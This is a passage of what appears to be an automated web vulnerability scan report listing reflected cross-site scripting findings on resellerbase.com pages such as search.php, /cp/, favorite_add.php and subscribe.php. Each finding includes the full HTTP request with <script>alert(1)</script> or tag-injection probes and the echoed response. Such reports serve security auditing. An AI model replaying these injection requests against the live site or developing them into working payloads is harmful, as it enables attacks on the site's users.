Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 10879<a>d37836de5ba was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=210879<a>d37836de5ba HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=210879<a>d37836de5ba was not found on this server.</p>
...[SNIP]...

2.797. http://www.resellerbase.com/communication/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8724<script>alert(1)</script>b7cb92f9694 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicatione8724<script>alert(1)</script>b7cb92f9694/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicatione8724<script>alert(1)</script>b7cb92f9694/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.798. http://www.resellerbase.com/communication/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload df42c<script>alert(1)</script>45cf54a5286 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themesdf42c<script>alert(1)</script>45cf54a5286/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesdf42c<script>alert(1)</script>45cf54a5286/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.799. http://www.resellerbase.com/communication/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 925a6<script>alert(1)</script>067d52094bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/search.php925a6<script>alert(1)</script>067d52094bb?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/search.php925a6<script>alert(1)</script>067d52094bb?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.800. http://www.resellerbase.com/communication/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 2e8d3<a>6680b37f4f3 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/search.php?keyword=search...&Submit3=Search2e8d3<a>6680b37f4f3&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/search.php?keyword=search...&Submit3=Search2e8d3<a>6680b37f4f3&opt=2 was not found on this server.</p>
...[SNIP]...

2.801. http://www.resellerbase.com/communication/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a5060<a>fad6e823213 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/search.php?keyword=search...a5060<a>fad6e823213&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/search.php?keyword=search...a5060<a>fad6e823213&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.802. http://www.resellerbase.com/communication/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 50b08<script>alert(1)</script>a26205c8ccc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/search.php?keyword=search...&Submit3=Search&opt=2&50b08<script>alert(1)</script>a26205c8ccc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/search.php?keyword=search...&Submit3=Search&opt=2&50b08<script>alert(1)</script>a26205c8ccc=1 was not found on this server.</p>
...[SNIP]...

2.803. http://www.resellerbase.com/communication/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload eb852<a>01da5f14604 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/search.php?keyword=search...&Submit3=Search&opt=2eb852<a>01da5f14604 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/search.php?keyword=search...&Submit3=Search&opt=2eb852<a>01da5f14604 was not found on this server.</p>
...[SNIP]...

2.804. http://www.resellerbase.com/cp/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /cp/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ddd67<script>alert(1)</script>90f36a48d0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cpddd67<script>alert(1)</script>90f36a48d0b/ HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /cpddd67<script>alert(1)</script>90f36a48d0b/ was not found on this server.</p>
...[SNIP]...

2.805. http://www.resellerbase.com/cp/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /cp/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ba70"><a>d79833c08df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ba70\"><a>d79833c08df in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cp/?2ba70"><a>d79833c08df=1 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:23:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Content-Type: text/html
Content-Length: 9248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/cp/?2ba70\"><a>d79833c08df=1" />
...[SNIP]...

2.806. http://www.resellerbase.com/cp/favorite_add.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /cp/favorite_add.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eac65<script>alert(1)</script>4b3b13244b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cpeac65<script>alert(1)</script>4b3b13244b2/favorite_add.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:56:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /cpeac65<script>alert(1)</script>4b3b13244b2/favorite_add.php was not found on this server.</p>
...[SNIP]...

2.807. http://www.resellerbase.com/cp/favorite_add.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /cp/favorite_add.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e6ff"><a>c5fa95c6fc6 was submitted in the REST URL parameter 2. This input was echoed as 2e6ff\"><a>c5fa95c6fc6 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cp/favorite_add.php2e6ff"><a>c5fa95c6fc6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:56:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/cp/favorite_add.php2e6ff\"><a>c5fa95c6fc6" />
...[SNIP]...

2.808. http://www.resellerbase.com/cp/favorite_add.php [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /cp/favorite_add.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c04c"><a>ff9d2d9cad4 was submitted in the id parameter. This input was echoed as 8c04c\"><a>ff9d2d9cad4 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cp/favorite_add.php?id=178c04c"><a>ff9d2d9cad4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:55:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/cp/favorite_add.php?id=178c04c\"><a>ff9d2d9cad4" />
...[SNIP]...

2.809. http://www.resellerbase.com/cp/favorite_add.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /cp/favorite_add.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a028e"><a>2200e28f086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a028e\"><a>2200e28f086 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cp/favorite_add.php?a028e"><a>2200e28f086=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:55:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/cp/favorite_add.php?a028e\"><a>2200e28f086=1" />
...[SNIP]...

2.810. http://www.resellerbase.com/cp/subscribe.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /cp/subscribe.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f2b3c<script>alert(1)</script>9476e9b4e3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cpf2b3c<script>alert(1)</script>9476e9b4e3c/subscribe.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:56:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /cpf2b3c<script>alert(1)</script>9476e9b4e3c/subscribe.php was not found on this server.</p>
...[SNIP]...

2.811. http://www.resellerbase.com/cp/subscribe.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /cp/subscribe.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1bf0"><a>3a46e233946 was submitted in the REST URL parameter 2. This input was echoed as d1bf0\"><a>3a46e233946 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cp/subscribe.phpd1bf0"><a>3a46e233946 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:56:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/cp/subscribe.phpd1bf0\"><a>3a46e233946" />
...[SNIP]...

2.812. http://www.resellerbase.com/cp/subscribe.php [cat parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /cp/subscribe.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45613"><a>e98b5451e58 was submitted in the cat parameter. This input was echoed as 45613\"><a>e98b5451e58 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cp/subscribe.php?cat=945613"><a>e98b5451e58 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:55:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/cp/subscribe.php?cat=945613\"><a>e98b5451e58" />
...[SNIP]...

2.813. http://www.resellerbase.com/cp/subscribe.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /cp/subscribe.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5baa"><a>abfadc9a4cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5baa\"><a>abfadc9a4cc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cp/subscribe.php?e5baa"><a>abfadc9a4cc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:55:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
